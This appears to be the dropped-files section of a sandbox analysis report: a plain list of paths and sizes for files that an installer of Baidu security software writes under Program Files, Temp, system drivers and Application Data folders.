%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\BDKVVirusPlugins.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DesktopToast.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerXMLScript.dat (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDbSqlite.dll (19592 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ad.dll (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DllInject.dll (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\DriverManager.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\UserDetectionPlugin.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMTinyXml.dll (6360 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\PullUpConfig.xml (1524 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\fm.dat (597 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonBHO.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVE.dll (9320 bytes)
%System%\drivers\BDArKit.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\user_trusted_list.dat (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bddownloader.exe (41699 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVMainFrame.dll (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bduf.dll (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMScriptVM.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ccesign.dat (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDConfig.dll (36536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\smr.dat (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch.7z (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSRCore.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMEvents.dll (15 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\7z.dll (12536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMReport.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CompatibilityChecker.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Repair_PluginConfig.xml (411 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanS.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavEngine.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWrench.sys (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerLuaScript.dat (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdBugRpt.exe (23936 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonBHO.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdcomproxy.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0002.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDDriverFixer.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PullUpConfig.xml (1524 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe (15116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\809.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframePluginContainerConfig.xml (384 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafePlugin.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\FileMon.dll (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KavUpdate.dll (12536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\scan_mgr_config.dat (5 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMFrameWork.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMStringUtils.dll (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanV.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMMsg.dll (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_customer.xml (75 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMNet.dll (5873 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMReport.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\duilib license.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdRepair.exe (16288 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCCommunicate.dll (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVMainFrame.dll (33633 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_product.xml (291 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\systemfile.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDDriverFixer.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\user_trusted_list.dat (125 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\putips_wording.dat (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\InstallCfg.xml (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavFrame.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVConfig.rdb (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.sys (8752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\patch.7z (33536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ToastImage.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMNet.dll (58168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\cache_config.dat (938 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVTray_PluginConfig.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\bd0003.sys (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMAVE.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDPerflog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPerfMon.dll (7192 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepMgr.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\810.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand64.dll (4992 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMPerfMon.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\baidusdRepair.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdTray.exe (66750 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\cache_config.dat (469 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\811.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\app.ico (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVEng.dll (46488 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVCached.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDCooly.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMReport.dll (23504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMFrameWork.dll (21480 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDConfig.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\blacksign.dat (1704 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHips.exe (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsBugRpt.exe (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\updlog.dll (13 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsUpdate.exe (37 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSkin.dll (33536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\DriverManager.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\smr.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\KVFixerConfigMgr.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVTray_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hipsClient.xml (784 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavCommon.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\app.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavCommon.dll (8184 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bddownloader.exe (9605 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavEngine.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\directui license.txt (593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCommunicate.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDriverFixer.dll (16368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafe.dll (33747 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\000005.sst (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000004 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (6347 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\smr.dat (95096 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\BaiduHipsCache.rptc (1368 bytes)
%System%\drivers\BDDefense.sys (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_PreU_2.1.xml (602 bytes)
%WinDir%\Temp\Tar1B.tmp (2784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_HipsClient_1.8.dll (2321 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.3.xml (602 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_PreU_1.8.xml (619 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.1.dll (9098 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (7972 bytes)
%WinDir%\Temp\Cab1A.tmp (56 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (1724 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\000005.sst (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000004 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.3.dll (6841 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.1.xml (602 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_PreU_1.8.xml (619 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_PreU_2.3.xml (602 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_customer.xml (597 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.dll (5873 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.dll (3897 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.dll (5873 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (6347 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (112 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (36 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.dll (2321 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.dll (9098 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.dll (7972 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.dll (9098 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.dll (7972 bytes)
%WinDir%\Temp\Tar15.tmp (2784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.dll (6841 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.dll (8657 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%WinDir%\Temp\Cab14.tmp (56 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000002 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.dll (3897 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (1728 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000002 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (816 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (7972 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.xml (17 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (816 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys.tmp.bdl (11169 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\dnw.xml.tmp.bdl (245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\fe56763bd610dbf0db84b6cd8b10202a.bdt (71 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerConfig.dat.bdl (1261 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\fb32afe4ccd37a3dbc2f8507075652b6.bdt (71 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\4224106754\Setting\host.dat (306 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (14 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerXMLScript.dat.bdl (158 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch5\putips_wording.dat.bdl (580 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch8\hipsClient.xml.bdl (5230 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerLuaScript.dat.bdl (4154 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\4224106754\Setting\p2pconfig.dat (64 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch10\hipsClient.xml.bdl (3394 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (8 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SWManager.rdb (25776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\CompatibilityChecker.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSysFixerPlugin.dll (34186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatchAgent.dll (3104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMDownload.dll (11496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerLuaScript.dat (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnTray.exe (66168 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDConfig.dll (3073 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\BDArKit.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatcher.dll (27704 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTips.rdb (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHips.exe (1856 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\patch.7z (23296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNet.dll (60999 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bdcomproxy.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccEngine.dll (8560 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDArKit.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\nsExec.dll (15 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMPatchAgent.dll (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAcceleratorPlugin.dll (29608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWNestCore.dll (18424 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMUpdate.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccCoolyPlugin.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASoftMgrCoolyPlugin.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\LocalPluginInfo.xml (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerScript.dat (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMMsg.dll (47 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_blank_speed.png (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\virus_type.dat (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libcurl.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOTraceCleanerConfig.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDCooly.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\NotInstalledPlugin.xml (428 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bd0002.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDefense.sys (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_appassext.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PreU.xml (643 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDDriverFixer.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDArKit.sys (11688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerConfig.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDActiveDefensePlugin.dll (7192 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsIU.dll (63 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\ad.dll (3361 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bd0001.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\7z.dll (12536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsCore.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\text_cn.str (757 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0002.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccSusPlugin.dll (12536 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Unknownfile.rdb (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_self_enc.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\scan_mgr_config.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAVCached.dll (24416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\wverify.dat (66168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_acc.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\homepage.ini (361 bytes)
%WinDir%\Fonts\baiduan_number_new.ttf (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginManager.dll (33295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWDeskGuide.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\vcrt.msi (22552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\publish.db (185551 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\DriverManager.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsBusiness.dll (1281 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_second_speed.png (15 bytes)
